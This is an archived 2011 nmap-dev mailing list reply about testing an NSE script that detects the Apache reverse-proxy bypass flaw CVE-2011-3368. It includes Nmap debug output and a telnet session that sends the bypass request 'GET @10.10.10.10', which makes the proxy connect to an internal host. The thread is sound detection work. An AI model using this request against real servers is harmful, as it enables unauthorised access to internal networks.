Nmap Development mailing list archives
Re: [Request for Testers] CVE-2011-3368 "Reverse Proxy Bypass"
From: Michael Meyer <michael.meyer () greenbone net>
Date: Tue, 11 Oct 2011 15:17:41 +0200
*** Gutek <ange.gutek () gmail com> wrote:
I've found a very few vulnerable ones, and that's not enough to be confident with this script. Of course I can't give them here, as I don't want to publicly expose them: that's why I'm calling for testers (2).
------------------------------------------------------------ Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2011-10-11 14:41 CEST --------------- Timing report --------------- hostgroups: min 1, max 100000 rtt-timeouts: init 1000, min 100, max 10000 max-scan-delay: TCP 1000, UDP 1000, SCTP 1000 parallelism: min 0, max 0 max-retries: 10, host-timeout: 0 min-rate: 0, max-rate: 0 --------------------------------------------- NSE: Loaded 1 scripts for scanning. NSE: Script Pre-scanning. NSE: Starting runlevel 1 (of 1) scan. mass_rdns: Using DNS server localhost mass_rdns: 0.00s 0/1 [#: 1, OK: 0, NX: 0, DR: 0, SF: 0, TR: 1] DNS resolution of 1 IPs took 0.00s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0] Packet capture filter (device lo): dst host 192.168.2.7 and (icmp or icmp6 or ((tcp or udp or sctp) and (src host 192.168.2.7))) Overall sending rates: 69.23 packets / s, 3046.04 bytes / s. NSE: Script scanning 192.168.2.7. NSE: Starting runlevel 1 (of 1) scan. NSE: Starting http-reverseproxy-bypass against 192.168.2.7:80. NSE: Total number of pipelined requests: 3 NSE: Number of requests allowed by pipeline: 100 NSE: Received only 3 of 100 expected responses. Decreasing max pipelined requests to 3. NSE: Number of received responses: 3 NSE: http-reverseproxy-bypass : test 1 returned a 200 NSE: http-reverseproxy-bypass : CHRONO 404: 0 NSE: http-reverseproxy-bypass : CHRONO REQUEST: 30 NSE: http-reverseproxy-bypass : test 2 returned a 200 NSE: http-reverseproxy-bypass : CHRONO 404: 0 NSE: http-reverseproxy-bypass : CHRONO REQUEST: 30 NSE: http-reverseproxy-bypass : test 3 returned a 200 NSE: http-reverseproxy-bypass : CHRONO 404: 0 NSE: http-reverseproxy-bypass : CHRONO REQUEST: 30 NSE: Finished http-reverseproxy-bypass against 192.168.2.7:80. Nmap scan report for 192.168.2.7 Host is up (0.000049s latency). Scanned at 2011-10-11 14:41:39 CEST for 95s PORT STATE SERVICE 80/tcp open http |_http-reverseproxy-bypass: NOT found vulnerable to CVE-2011-3368, but allows requests to external websites Final times for host: srtt: 49 rttvar: 5000 to: 100000 NSE: Script Post-scanning. NSE: Starting runlevel 1 (of 1) scan. Read from /opt/nmap/bin/../share/nmap: nmap-payloads nmap-services. Nmap done: 1 IP address (1 host up) scanned in 95.20 seconds ------------------------------------------------------------ mime@kira[13]: ~ 0)$ netstat -n | grep 10\\. tcp 0 1 192.168.2.7:45166 10.0.0.61:80 SYN_SENT
if reference.status and chrono_request > (chrono_404+1) then -- vulnerable if we get an error status after a consequent delay
I guess, that reference.status is not true, if the response take longer than the 30 second timeout? mime@kira[18]: ~ 0)$ date Di 11. Okt 14:57:39 CEST 2011 ^^^^^^^^ mime@kira[18]: ~ 0)$ telnet 192.168.2.7 80 Trying 192.168.2.7... Connected to 192.168.2.7. Escape character is '^]'. GET @10.10.10.10 HTTP/1.0 [Tue Oct 11 15:01:01 2011] [error] (110)Connection timed out: proxy: HTTP: attempt to connect to 10.10.10.10:80 (*) failed ^^^^^^^^ I have to wait ~3 minutes for a response if the host is in an other network. HTH Micha -- Michael Meyer OpenPGP Key: 52A6EFA6 http://www.greenbone.net/ Greenbone Networks GmbH, Neuer Graben 17, 49074 Osnabrück | AG Osnabrück, HR B 202460 Geschäftsführer: Lukas Grunwald, Dr. Jan-Oliver Wagner _______________________________________________ Sent through the nmap-dev mailing list http://cgi.insecure.org/mailman/listinfo/nmap-dev Archived at http://seclists.org/nmap-dev/
Current thread:
- [Request for Testers] CVE-2011-3368 "Reverse Proxy Bypass" Gutek (Oct 10)
- Re: [Request for Testers] CVE-2011-3368 "Reverse Proxy Bypass" Paulino Calderon (Oct 10)
- Re: [Request for Testers] CVE-2011-3368 "Reverse Proxy Bypass" Gutek (Oct 11)
- Re: [Request for Testers] CVE-2011-3368 "Reverse Proxy Bypass" David Fifield (Oct 12)
- Re: [Request for Testers] CVE-2011-3368 "Reverse Proxy Bypass" Michael Meyer (Oct 11)
- Re: [Request for Testers] CVE-2011-3368 "Reverse Proxy Bypass" Gutek (Oct 11)
- Re: [Request for Testers] CVE-2011-3368 "Reverse Proxy Bypass" Michael Meyer (Oct 12)
- Re: [Request for Testers] CVE-2011-3368 "Reverse Proxy Bypass" Gutek (Oct 12)
- Re: [Request for Testers] CVE-2011-3368 "Reverse Proxy Bypass" Michael Meyer (Oct 12)
- Re: [Request for Testers] CVE-2011-3368 "Reverse Proxy Bypass" Patrik Karlsson (Nov 05)
- Re: [Request for Testers] CVE-2011-3368 "Reverse Proxy Bypass" Patrik Karlsson (Nov 11)
- Re: [Request for Testers] CVE-2011-3368 "Reverse Proxy Bypass" Patrik Karlsson (Nov 17)
- Re: [Request for Testers] CVE-2011-3368 "Reverse Proxy Bypass" Gutek (Oct 11)
- Re: [Request for Testers] CVE-2011-3368 "Reverse Proxy Bypass" Paulino Calderon (Oct 10)